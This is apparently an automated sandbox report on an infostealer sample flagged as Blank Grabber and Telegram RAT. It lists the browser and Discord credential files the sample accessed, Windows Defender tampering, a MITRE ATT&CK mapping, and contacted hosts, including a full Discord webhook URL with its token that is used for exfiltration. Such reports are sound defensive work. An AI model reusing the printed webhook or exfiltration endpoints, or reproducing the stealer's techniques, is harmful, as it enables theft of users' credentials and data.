              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean
              Tries to steal communication platform credentials (via file / registry access)
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Discord
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\DiscordCanary
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\DiscordPTB
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\DiscordDevelopment
              Source: Yara matchFile source: 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7280, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Blank Grabber
              Source: Yara matchFile source: 00000001.00000002.2096102942.000001C916489000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1701296843.00000162C4354000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2098275549.000001C916C2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1701296843.00000162C4352000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2090937481.000001C917404000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7264, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7280, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI72642\rarreg.key, type: DROPPED
              Yara detected Telegram RAT
              Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7280, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		3
              Disable or Modify Tools              		1
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		3
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Native API              		2
              Registry Run Keys / Startup Folder              		1
              Access Token Manipulation              		11
              Deobfuscate/Decode Files or Information              		LSASS Memory3
              File and Directory Discovery              		Remote Desktop Protocol2
              Data from Local System              		21
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              Command and Scripting Interpreter              		Logon Script (Windows)11
              Process Injection              		21
              Obfuscated Files or Information              		Security Account Manager58
              System Information Discovery              		SMB/Windows Admin Shares11
              Email Collection              		4
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts3
              PowerShell              		Login Hook2
              Registry Run Keys / Startup Folder              		11
              Software Packing              		NTDS161
              Security Software Discovery              		Distributed Component Object Model1
              Clipboard Data              		5
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Timestomp              		LSA Secrets2
              Process Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials151
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Masquerading              		DCSync1
              Application Window Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
              Virtualization/Sandbox Evasion              		Proc Filesystem1
              System Network Configuration Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Access Token Manipulation              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
              Process Injection              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561562 Sample: cmd.exe Startdate: 23/11/2024 Architecture: WINDOWS Score: 100 70 ip-api.com 2->70 72 discord.com 2->72 80 Found malware configuration 2->80 82 Multi AV Scanner detection for submitted file 2->82 84 Yara detected Blank Grabber 2->84 86 9 other signatures 2->86 11 cmd.exe 22 2->11         started        15 svchost.exe 2->15         started        signatures3 process4 dnsIp5 62 C:\Users\user\AppData\Local\Temp\...\rar.exe, PE32+ 11->62 dropped 64 C:\Users\user\AppData\Local\...\rarreg.key, ASCII 11->64 dropped 66 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 11->66 dropped 68 16 other files (none is malicious) 11->68 dropped 108 Modifies Windows Defender protection settings 11->108 110 Adds a directory exclusion to Windows Defender 11->110 112 Removes signatures from Windows Defender 11->112 18 cmd.exe 11->18         started        78 127.0.0.1 unknown unknown 15->78 file6 signatures7 process8 dnsIp9 74 ip-api.com 208.95.112.1, 49747, 80 TUT-ASUS United States 18->74 76 discord.com 162.159.128.233, 443, 49748 CLOUDFLARENETUS United States 18->76 88 Found many strings related to Crypto-Wallets (likely being stolen) 18->88 90 Tries to harvest and steal browser information (history, passwords, etc) 18->90 92 Modifies Windows Defender protection settings 18->92 94 3 other signatures 18->94 22 cmd.exe 1 18->22         started        25 cmd.exe 1 18->25         started        27 cmd.exe 1 18->27         started        29 22 other processes 18->29 signatures10 process11 signatures12 96 Suspicious powershell command line found 22->96 98 Encrypted powershell cmdline option found 22->98 100 Bypasses PowerShell execution policy 22->100 31 powershell.exe 23 22->31         started        34 conhost.exe 22->34         started        102 Modifies Windows Defender protection settings 25->102 104 Removes signatures from Windows Defender 25->104 36 powershell.exe 23 25->36         started        46 2 other processes 25->46 106 Adds a directory exclusion to Windows Defender 27->106 38 powershell.exe 23 27->38         started        40 conhost.exe 27->40         started        42 getmac.exe 29->42         started        44 systeminfo.exe 29->44         started        48 42 other processes 29->48 process13 file14 114 Loading BitLocker PowerShell Module 38->114 116 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 42->116 118 Writes or reads registry keys via WMI 42->118 56 C:\Users\user\AppData\...\bcdu5fii.cmdline, Unicode 48->56 dropped 58 C:\Users\user\AppData\Local\Temp\DBdXv.zip, RAR 48->58 dropped 51 csc.exe 48->51         started        signatures15 process16 file17 60 C:\Users\user\AppData\Local\...\bcdu5fii.dll, PE32 51->60 dropped 54 cvtres.exe 51->54         started        process18

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              cmd.exe37%ReversingLabsWin64.Trojan.Generic

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\_MEI72642\VCRUNTIME140.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72642\_bz2.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72642\_ctypes.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72642\_decimal.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72642\_hashlib.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72642\_lzma.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72642\_queue.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72642\_socket.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72642\_sqlite3.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72642\_ssl.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72642\libcrypto-1_1.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72642\libffi-7.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72642\libssl-1_1.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72642\python310.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72642\select.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72642\sqlite3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72642\unicodedata.pyd0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://ocsp.sectigoc0%Avira URL Cloudsafe
              http://crl.comodoi0%Avira URL Cloudsafe
              http://crl.microsus0%Avira URL Cloudsafe
              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsC0%Avira URL Cloudsafe
              http://crl.comodo0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              discord.com
              		162.159.128.233
              		truefalse
                		high
                ip-api.com
                		208.95.112.1
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://discord.com/api/webhooks/1309732604697772032/jYDmGek7yWvABusaZDozvumeMuAZjheHcNL9cOnpMCpam2eP5UOyLvUjSMysvJJlJbg0false
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtabcmd.exe, 00000001.00000003.1935481751.000001C9168CC000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://github.com/Blank-c/BlankOBFcmd.exe, 00000001.00000003.1711260677.000001C916970000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1712399231.000001C916970000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1711786207.000001C916970000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1711452846.000001C916D3A000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://api.telegram.org/bot%s/%scmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpfalse
                          		high
                          https://www.avito.ru/cmd.exe, 00000001.00000002.2098986140.000001C917160000.00000004.00001000.00020000.00000000.sdmpfalse
                            		high
                            https://duckduckgo.com/ac/?q=cmd.exe, 00000001.00000003.1935481751.000001C9168CC000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0cmd.exefalse
                                		high
                                https://github.com/Blank-c/Blank-Grabbericmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.ctrip.com/cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C8A000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#cmd.exefalse
                                      		high
                                      http://www.microsoft.copowershell.exe, 0000002A.00000002.1920794731.00000216A4D78000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://g.live.com/odclientsettings/ProdV2.C:edb.log.28.drfalse
                                          		high
                                          https://python.org/dev/peps/pep-0263/cmd.exe, 00000001.00000002.2103718969.00007FFDFB784000.00000040.00000001.01000000.00000004.sdmpfalse
                                            		high
                                            https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#cmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095198142.000001C9143C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.leboncoin.fr/cmd.exe, 00000001.00000002.2100068134.000001C9179C8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                http://ocsp.sectigoccmd.exe, 00000000.00000002.2112093875.00000162C4338000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://tools.ietf.org/html/rfc2388#section-4.4cmd.exe, 00000001.00000002.2096102942.000001C916430000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://g.live.com/odclientsettings/Prod.C:edb.log.28.drfalse
                                                    		high
                                                    https://weibo.com/cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2100068134.000001C9179C8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2100068134.000001C917A04000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://api.anonfiles.com/uploadcmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.msn.comcmd.exe, 00000001.00000002.2100068134.000001C917A74000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C79000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
